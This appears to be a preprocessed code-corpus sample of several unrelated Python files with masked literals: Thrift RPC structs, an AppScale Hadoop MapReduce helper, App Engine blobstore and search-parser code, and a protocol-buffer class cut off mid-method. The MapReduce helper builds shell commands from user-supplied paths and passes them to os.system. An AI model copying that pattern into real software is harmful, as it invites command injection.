success = value_t ( ) <EOL> self . success . read ( iprot ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . success != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:success>' , TType . STRUCT , <NUM_LIT:0> ) <EOL> self . success . write ( oprot ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __str__ ( self ) : <EOL> return str ( self . __dict__ ) <EOL> def __repr__ ( self ) : <EOL> return repr ( self . __dict__ ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class put_args : <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT:store>' , None , None , ) , <EOL> ( <NUM_LIT:2> , TType . STRING , '<STR_LIT:key>' , None , None , ) , <EOL> ( <NUM_LIT:3> , TType . STRING , '<STR_LIT:value>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , d = None ) : <EOL> self . store = None <EOL> self . key = None <EOL> self . value = None <EOL> if isinstance ( d , dict ) : <EOL> if '<STR_LIT:store>' in d : <EOL> self . store = d [ '<STR_LIT:store>' ] <EOL> if '<STR_LIT:key>' in d : <EOL> self . key = d [ '<STR_LIT:key>' ] <EOL> if '<STR_LIT:value>' in d : <EOL> self . value = d [ '<STR_LIT:value>' ] <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . 
CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . store = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:2> : <EOL> if ftype == TType . STRING : <EOL> self . key = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:3> : <EOL> if ftype == TType . STRING : <EOL> self . value = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . store != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:store>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . store ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . key != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:key>' , TType . STRING , <NUM_LIT:2> ) <EOL> oprot . writeString ( self . key ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . value != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:value>' , TType . STRING , <NUM_LIT:3> ) <EOL> oprot . writeString ( self . value ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __str__ ( self ) : <EOL> return str ( self . 
__dict__ ) <EOL> def __repr__ ( self ) : <EOL> return repr ( self . __dict__ ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class put_result : <EOL> thrift_spec = ( <EOL> ) <EOL> def __init__ ( self , d = None ) : <EOL> pass <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __str__ ( self ) : <EOL> return str ( self . __dict__ ) <EOL> def __repr__ ( self ) : <EOL> return repr ( self . __dict__ ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class remove_args : <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT:store>' , None , None , ) , <EOL> ( <NUM_LIT:2> , TType . 
STRING , '<STR_LIT:key>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , d = None ) : <EOL> self . store = None <EOL> self . key = None <EOL> if isinstance ( d , dict ) : <EOL> if '<STR_LIT:store>' in d : <EOL> self . store = d [ '<STR_LIT:store>' ] <EOL> if '<STR_LIT:key>' in d : <EOL> self . key = d [ '<STR_LIT:key>' ] <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . store = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:2> : <EOL> if ftype == TType . STRING : <EOL> self . key = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . store != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:store>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . store ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . key != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:key>' , TType . STRING , <NUM_LIT:2> ) <EOL> oprot . writeString ( self . key ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . 
writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __str__ ( self ) : <EOL> return str ( self . __dict__ ) <EOL> def __repr__ ( self ) : <EOL> return repr ( self . __dict__ ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class remove_result : <EOL> thrift_spec = ( <EOL> ) <EOL> def __init__ ( self , d = None ) : <EOL> pass <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __str__ ( self ) : <EOL> return str ( self . __dict__ ) <EOL> def __repr__ ( self ) : <EOL> return repr ( self . __dict__ ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) </s>
<s> import os <EOL> import re <EOL> import sys <EOL> import time <EOL> import urllib <EOL> import yaml <EOL> from google . appengine . api import users <EOL> APPSCALE_HOME = os . environ . get ( "<STR_LIT>" ) <EOL> HADOOP_VER = "<STR_LIT>" <EOL> HADOOP_HOME = APPSCALE_HOME + "<STR_LIT>" + HADOOP_VER + "<STR_LIT:/>" <EOL> HADOOP_BIN = APPSCALE_HOME + "<STR_LIT>" + HADOOP_VER + "<STR_LIT>" <EOL> HADOOP_STREAMING = HADOOP_HOME + "<STR_LIT>" + HADOOP_VER + "<STR_LIT>" <EOL> DBS_W_HADOOP = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> class MapReduceException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> """<STR_LIT>""" <EOL> def can_run_jobs ( ) : <EOL> """<STR_LIT>""" <EOL> stream = file ( "<STR_LIT>" , '<STR_LIT:r>' ) <EOL> contents = yaml . load ( stream ) <EOL> try : <EOL> database = contents [ '<STR_LIT>' ] <EOL> if database in DBS_W_HADOOP : <EOL> return True <EOL> else : <EOL> return False <EOL> except KeyError : <EOL> return False <EOL> def get_lang ( filename ) : <EOL> """<STR_LIT>""" <EOL> supportedExtensions = { <EOL> "<STR_LIT:rb>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> try : <EOL> extension = filename . split ( "<STR_LIT:.>" ) [ - <NUM_LIT:1> ] <EOL> lang = supportedExtensions [ extension ] <EOL> return lang <EOL> except : <EOL> raise MapReduceException ( "<STR_LIT>" % extension ) <EOL> def ensure_user_is_mapreduce_authorized ( ) : <EOL> """<STR_LIT>""" <EOL> if not users . is_current_user_capable ( "<STR_LIT>" ) : <EOL> raise MapReduceException ( "<STR_LIT>" ) <EOL> def write_temp_file ( suffix , data ) : <EOL> """<STR_LIT>""" <EOL> ensure_user_is_mapreduce_authorized ( ) <EOL> suffix = urllib . unquote ( suffix ) <EOL> regex = r"<STR_LIT>" <EOL> pattern = re . compile ( regex ) <EOL> suffix = pattern . sub ( '<STR_LIT>' , suffix ) <EOL> fileLoc = "<STR_LIT>" + suffix <EOL> f = open ( fileLoc , "<STR_LIT>" ) <EOL> f . write ( data ) <EOL> f . 
close ( ) <EOL> return fileLoc <EOL> def get_all_ips ( ) : <EOL> """<STR_LIT>""" <EOL> ensure_user_is_mapreduce_authorized ( ) <EOL> all_ips = [ ] <EOL> fileLoc = "<STR_LIT>" <EOL> if os . path . exists ( fileLoc ) : <EOL> f = open ( fileLoc ) <EOL> text = f . read ( ) <EOL> all_ips = text . split ( "<STR_LIT:\n>" ) <EOL> return all_ips <EOL> def get_num_of_nodes ( ) : <EOL> """<STR_LIT>""" <EOL> ensure_user_is_mapreduce_authorized ( ) <EOL> num_of_nodes = <NUM_LIT:0> <EOL> fileLoc = "<STR_LIT>" <EOL> if os . path . exists ( fileLoc ) : <EOL> f = open ( fileLoc ) <EOL> num_of_nodes = int ( f . read ( ) ) <EOL> return num_of_nodes <EOL> def put_mr_input ( data , inputLoc ) : <EOL> """<STR_LIT>""" <EOL> ensure_user_is_mapreduce_authorized ( ) <EOL> inputLoc = urllib . unquote ( inputLoc ) <EOL> regex = r"<STR_LIT>" <EOL> pattern = re . compile ( regex ) <EOL> inputLoc = pattern . sub ( '<STR_LIT>' , inputLoc ) <EOL> fileLoc = "<STR_LIT>" + inputLoc <EOL> f = open ( fileLoc , "<STR_LIT>" ) <EOL> f . write ( data ) <EOL> f . close ( ) <EOL> removeInput = HADOOP_BIN + "<STR_LIT>" + inputLoc <EOL> sys . stderr . write ( removeInput + "<STR_LIT:\n>" ) <EOL> os . system ( removeInput ) <EOL> put = HADOOP_BIN + "<STR_LIT>" + fileLoc + "<STR_LIT:U+0020>" + inputLoc <EOL> os . system ( put ) <EOL> def run_mr_job ( mapper , reducer , inputLoc , outputLoc , config = { } ) : <EOL> """<STR_LIT>""" <EOL> ensure_user_is_mapreduce_authorized ( ) <EOL> mapper = urllib . unquote ( mapper ) <EOL> reducer = urllib . unquote ( reducer ) <EOL> inputLoc = urllib . unquote ( inputLoc ) <EOL> outputLoc = urllib . unquote ( outputLoc ) <EOL> regex = r"<STR_LIT>" <EOL> pattern = re . compile ( regex ) <EOL> mydir = os . getcwd ( ) + "<STR_LIT:/>" <EOL> mapper = "<STR_LIT>" + getLang ( mapper ) + "<STR_LIT:U+0020>" + mydir + pattern . sub ( '<STR_LIT>' , mapper ) + "<STR_LIT>" <EOL> reducer = "<STR_LIT>" + getLang ( reducer ) + "<STR_LIT:U+0020>" + mydir + pattern . 
sub ( '<STR_LIT>' , reducer ) + "<STR_LIT>" <EOL> inputLoc = pattern . sub ( '<STR_LIT>' , inputLoc ) <EOL> outputLoc = pattern . sub ( '<STR_LIT>' , outputLoc ) <EOL> removeOutput = HADOOP_BIN + "<STR_LIT>" + outputLoc <EOL> sys . stderr . write ( removeOutput + "<STR_LIT:\n>" ) <EOL> os . system ( removeOutput ) <EOL> formattedConfig = "<STR_LIT>" <EOL> for key in config : <EOL> formattedConfig = formattedConfig + "<STR_LIT>" + key + "<STR_LIT:=>" + config [ key ] <EOL> command = HADOOP_BIN + "<STR_LIT>" + HADOOP_STREAMING + "<STR_LIT:U+0020>" + formattedConfig + "<STR_LIT>" + inputLoc + "<STR_LIT>" + outputLoc + "<STR_LIT>" + mapper + "<STR_LIT>" + reducer <EOL> sys . stderr . write ( "<STR_LIT:\n>" + command + "<STR_LIT:\n>" ) <EOL> start = time . time ( ) <EOL> os . system ( command ) <EOL> end = time . time ( ) <EOL> sys . stderr . write ( "<STR_LIT>" + str ( end - start ) + "<STR_LIT>" ) <EOL> def get_mr_output ( outputLoc ) : <EOL> """<STR_LIT>""" <EOL> ensure_user_is_mapreduce_authorized ( ) <EOL> outputLoc = urllib . unquote ( outputLoc ) <EOL> regex = r"<STR_LIT>" <EOL> pattern = re . compile ( regex ) <EOL> outputLoc = pattern . sub ( '<STR_LIT>' , outputLoc ) <EOL> fileLoc = "<STR_LIT>" + outputLoc <EOL> rmr = "<STR_LIT>" + fileLoc <EOL> os . system ( rmr ) <EOL> get = HADOOP_BIN + "<STR_LIT>" + outputLoc + "<STR_LIT:U+0020>" + fileLoc <EOL> os . system ( get ) <EOL> if os . path . exists ( fileLoc ) : <EOL> cmd = "<STR_LIT>" + fileLoc + "<STR_LIT>" <EOL> return os . popen ( cmd ) . read ( ) <EOL> else : <EOL> raise MapReduceException ( "<STR_LIT>" ) <EOL> def get_mr_logs ( outputLoc ) : <EOL> """<STR_LIT>""" <EOL> ensure_user_is_mapreduce_authorized ( ) <EOL> outputLoc = urllib . unquote ( outputLoc ) <EOL> regex = r"<STR_LIT>" <EOL> pattern = re . compile ( regex ) <EOL> outputLoc = pattern . sub ( '<STR_LIT>' , outputLoc ) <EOL> fileLoc = "<STR_LIT>" + outputLoc <EOL> rmr = "<STR_LIT>" + fileLoc <EOL> os . 
system ( rmr ) <EOL> get = HADOOP_BIN + "<STR_LIT>" + outputLoc + "<STR_LIT:U+0020>" + fileLoc <EOL> os . system ( get ) <EOL> if os . path . exists ( fileLoc ) : <EOL> cmd = "<STR_LIT>" + fileLoc + "<STR_LIT>" <EOL> return os . popen ( cmd ) . read ( ) <EOL> else : <EOL> raise MapReduceException ( "<STR_LIT>" % outputLoc ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import with_statement <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> import urllib <EOL> from google . appengine . api . files import file as files <EOL> from google . appengine . api import datastore <EOL> from google . appengine . ext import blobstore <EOL> _BLOBSTORE_FILESYSTEM = '<STR_LIT>' <EOL> _BLOBSTORE_DIRECTORY = '<STR_LIT:/>' + _BLOBSTORE_FILESYSTEM + '<STR_LIT:/>' <EOL> _BLOBSTORE_NEW_FILE_NAME = '<STR_LIT>' <EOL> _CREATION_HANDLE_PREFIX = '<STR_LIT>' <EOL> _MIME_TYPE_PARAMETER = '<STR_LIT>' <EOL> _BLOBINFO_UPLOADED_FILENAME_PARAMETER = '<STR_LIT>' <EOL> def create ( mime_type = '<STR_LIT>' , <EOL> _blobinfo_uploaded_filename = None ) : <EOL> """<STR_LIT>""" <EOL> if not mime_type : <EOL> raise files . InvalidArgumentError ( '<STR_LIT>' ) <EOL> if not isinstance ( mime_type , basestring ) : <EOL> raise files . InvalidArgumentError ( '<STR_LIT>' ) <EOL> params = { _MIME_TYPE_PARAMETER : mime_type } <EOL> if _blobinfo_uploaded_filename : <EOL> if not isinstance ( _blobinfo_uploaded_filename , basestring ) : <EOL> raise files . InvalidArgumentError ( <EOL> '<STR_LIT>' ) <EOL> params [ _BLOBINFO_UPLOADED_FILENAME_PARAMETER ] = _blobinfo_uploaded_filename <EOL> return files . _create ( _BLOBSTORE_FILESYSTEM , params = params ) <EOL> _BLOB_FILE_INDEX_KIND = '<STR_LIT>' <EOL> _BLOB_KEY_PROPERTY_NAME = '<STR_LIT>' <EOL> def get_blob_key ( create_file_name ) : <EOL> """<STR_LIT>""" <EOL> if not create_file_name : <EOL> raise files . InvalidArgumentError ( '<STR_LIT>' ) <EOL> if not isinstance ( create_file_name , basestring ) : <EOL> raise files . InvalidArgumentError ( '<STR_LIT>' ) <EOL> if not create_file_name . startswith ( _BLOBSTORE_DIRECTORY ) : <EOL> raise files . InvalidFileNameError ( <EOL> '<STR_LIT>' % <EOL> ( create_file_name , _BLOBSTORE_DIRECTORY ) ) <EOL> ticket = create_file_name [ len ( _BLOBSTORE_DIRECTORY ) : ] <EOL> if not ticket . 
startswith ( _CREATION_HANDLE_PREFIX ) : <EOL> return blobstore . BlobKey ( ticket ) <EOL> blob_file_index = datastore . Get ( [ datastore . Key . from_path ( <EOL> _BLOB_FILE_INDEX_KIND , <EOL> ticket ) ] ) [ <NUM_LIT:0> ] <EOL> if blob_file_index : <EOL> blob_key_str = blob_file_index [ _BLOB_KEY_PROPERTY_NAME ] <EOL> results = datastore . Get ( [ datastore . Key . from_path ( <EOL> blobstore . BLOB_INFO_KIND , blob_key_str ) ] ) <EOL> if results [ <NUM_LIT:0> ] is None : <EOL> return None <EOL> else : <EOL> query = datastore . Query ( blobstore . BLOB_INFO_KIND , <EOL> { '<STR_LIT>' : ticket } , <EOL> keys_only = True , <EOL> namespace = '<STR_LIT>' ) <EOL> results = query . Get ( <NUM_LIT:1> ) <EOL> if not results : <EOL> return None <EOL> blob_key_str = results [ <NUM_LIT:0> ] . name ( ) <EOL> return blobstore . BlobKey ( blob_key_str ) <EOL> def get_file_name ( blob_key ) : <EOL> """<STR_LIT>""" <EOL> if not blob_key : <EOL> raise files . InvalidArgumentError ( '<STR_LIT>' ) <EOL> if not isinstance ( blob_key , ( blobstore . BlobKey , basestring ) ) : <EOL> raise files . InvalidArgumentError ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' % ( _BLOBSTORE_DIRECTORY , blob_key ) <EOL> def _delete ( filename ) : <EOL> """<STR_LIT>""" <EOL> blob_key = get_blob_key ( filename ) <EOL> if blob_key is None : <EOL> return <EOL> blob_info = blobstore . BlobInfo . get ( blob_key ) <EOL> if blob_info is None : <EOL> return <EOL> blob_info . delete ( ) </s>
<s> """<STR_LIT>""" <EOL> from google . appengine . _internal import antlr3 <EOL> from google . appengine . api . search import QueryLexer <EOL> from google . appengine . api . search import QueryParser <EOL> class QueryException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class QueryLexerWithErrors ( QueryLexer . QueryLexer ) : <EOL> """<STR_LIT>""" <EOL> def emitErrorMessage ( self , msg ) : <EOL> """<STR_LIT>""" <EOL> raise QueryException ( msg ) <EOL> class QueryParserWithErrors ( QueryParser . QueryParser ) : <EOL> """<STR_LIT>""" <EOL> def emitErrorMessage ( self , msg ) : <EOL> """<STR_LIT>""" <EOL> raise QueryException ( msg ) <EOL> def CreateParser ( query ) : <EOL> """<STR_LIT>""" <EOL> input_string = antlr3 . ANTLRStringStream ( query ) <EOL> lexer = QueryLexerWithErrors ( input_string ) <EOL> tokens = antlr3 . CommonTokenStream ( lexer ) <EOL> parser = QueryParserWithErrors ( tokens ) <EOL> return parser <EOL> def Parse ( query ) : <EOL> """<STR_LIT>""" <EOL> parser = CreateParser ( query ) <EOL> try : <EOL> return parser . query ( ) <EOL> except Exception , e : <EOL> raise QueryException ( e . message ) <EOL> def Simplify ( parser_return ) : <EOL> """<STR_LIT>""" <EOL> if parser_return . tree : <EOL> return _SimplifyNode ( parser_return . tree ) <EOL> return parser_return <EOL> def _SimplifyNode ( node ) : <EOL> """<STR_LIT>""" <EOL> if not node . getType ( ) : <EOL> return _SimplifyNode ( node . children [ <NUM_LIT:0> ] ) <EOL> elif node . getType ( ) is QueryParser . CONJUNCTION and node . getChildCount ( ) is <NUM_LIT:1> : <EOL> return _SimplifyNode ( node . children [ <NUM_LIT:0> ] ) <EOL> elif node . getType ( ) is QueryParser . DISJUNCTION and node . getChildCount ( ) is <NUM_LIT:1> : <EOL> return _SimplifyNode ( node . children [ <NUM_LIT:0> ] ) <EOL> elif ( node . getType ( ) is QueryParser . RESTRICTION and node . getChildCount ( ) is <NUM_LIT:2> <EOL> and node . children [ <NUM_LIT:0> ] . getType ( ) is QueryParser . 
GLOBAL ) : <EOL> return _SimplifyNode ( node . children [ <NUM_LIT:1> ] ) <EOL> elif ( node . getType ( ) is QueryParser . VALUE and node . getChildCount ( ) is <NUM_LIT:2> and <EOL> ( node . children [ <NUM_LIT:0> ] . getType ( ) is QueryParser . WORD or <EOL> node . children [ <NUM_LIT:0> ] . getType ( ) is QueryParser . STRING or <EOL> node . children [ <NUM_LIT:0> ] . getType ( ) is QueryParser . NUMBER ) ) : <EOL> return _SimplifyNode ( node . children [ <NUM_LIT:1> ] ) <EOL> elif ( ( node . getType ( ) is QueryParser . EQ or node . getType ( ) is QueryParser . HAS ) <EOL> and node . getChildCount ( ) is <NUM_LIT:1> ) : <EOL> return _SimplifyNode ( node . children [ <NUM_LIT:0> ] ) <EOL> for i , child in enumerate ( node . children ) : <EOL> node . setChild ( i , _SimplifyNode ( child ) ) <EOL> return node </s>
<s> from google . net . proto import ProtocolBuffer <EOL> import array <EOL> import dummy_thread as thread <EOL> __pychecker__ = """<STR_LIT>""" <EOL> if hasattr ( ProtocolBuffer , '<STR_LIT>' ) : <EOL> _extension_runtime = True <EOL> _ExtendableProtocolMessage = ProtocolBuffer . ExtendableProtocolMessage <EOL> else : <EOL> _extension_runtime = False <EOL> _ExtendableProtocolMessage = ProtocolBuffer . ProtocolMessage <EOL> class FieldValue ( ProtocolBuffer . ProtocolMessage ) : <EOL> TEXT = <NUM_LIT:0> <EOL> HTML = <NUM_LIT:1> <EOL> ATOM = <NUM_LIT:2> <EOL> DATE = <NUM_LIT:3> <EOL> NUMBER = <NUM_LIT:4> <EOL> _ContentType_NAMES = { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> } <EOL> def ContentType_Name ( cls , x ) : return cls . _ContentType_NAMES . get ( x , "<STR_LIT>" ) <EOL> ContentType_Name = classmethod ( ContentType_Name ) <EOL> has_type_ = <NUM_LIT:0> <EOL> type_ = <NUM_LIT:0> <EOL> has_language_ = <NUM_LIT:0> <EOL> language_ = "<STR_LIT>" <EOL> has_string_value_ = <NUM_LIT:0> <EOL> string_value_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def type ( self ) : return self . type_ <EOL> def set_type ( self , x ) : <EOL> self . has_type_ = <NUM_LIT:1> <EOL> self . type_ = x <EOL> def clear_type ( self ) : <EOL> if self . has_type_ : <EOL> self . has_type_ = <NUM_LIT:0> <EOL> self . type_ = <NUM_LIT:0> <EOL> def has_type ( self ) : return self . has_type_ <EOL> def language ( self ) : return self . language_ <EOL> def set_language ( self , x ) : <EOL> self . has_language_ = <NUM_LIT:1> <EOL> self . language_ = x <EOL> def clear_language ( self ) : <EOL> if self . has_language_ : <EOL> self . has_language_ = <NUM_LIT:0> <EOL> self . language_ = "<STR_LIT>" <EOL> def has_language ( self ) : return self . 
has_language_ <EOL> def string_value ( self ) : return self . string_value_ <EOL> def set_string_value ( self , x ) : <EOL> self . has_string_value_ = <NUM_LIT:1> <EOL> self . string_value_ = x <EOL> def clear_string_value ( self ) : <EOL> if self . has_string_value_ : <EOL> self . has_string_value_ = <NUM_LIT:0> <EOL> self . string_value_ = "<STR_LIT>" <EOL> def has_string_value ( self ) : return self . has_string_value_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_type ( ) ) : self . set_type ( x . type ( ) ) <EOL> if ( x . has_language ( ) ) : self . set_language ( x . language ( ) ) <EOL> if ( x . has_string_value ( ) ) : self . set_string_value ( x . string_value ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_type_ != x . has_type_ : return <NUM_LIT:0> <EOL> if self . has_type_ and self . type_ != x . type_ : return <NUM_LIT:0> <EOL> if self . has_language_ != x . has_language_ : return <NUM_LIT:0> <EOL> if self . has_language_ and self . language_ != x . language_ : return <NUM_LIT:0> <EOL> if self . has_string_value_ != x . has_string_value_ : return <NUM_LIT:0> <EOL> if self . has_string_value_ and self . string_value_ != x . string_value_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_type_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . type_ ) <EOL> if ( self . has_language_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . language_ ) ) <EOL> if ( self . has_string_value_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . string_value_ ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_type_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . type_ ) <EOL> if ( self . has_language_ ) : n += <NUM_LIT:1> + self . 
lengthString ( len ( self . language_ ) ) <EOL> if ( self . has_string_value_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . string_value_ ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_type ( ) <EOL> self . clear_language ( ) <EOL> self . clear_string_value ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_type_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . type_ ) <EOL> if ( self . has_language_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . language_ ) <EOL> if ( self . has_string_value_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . string_value_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_type_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . type_ ) <EOL> if ( self . has_language_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . language_ ) <EOL> if ( self . has_string_value_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . string_value_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:8> : <EOL> self . 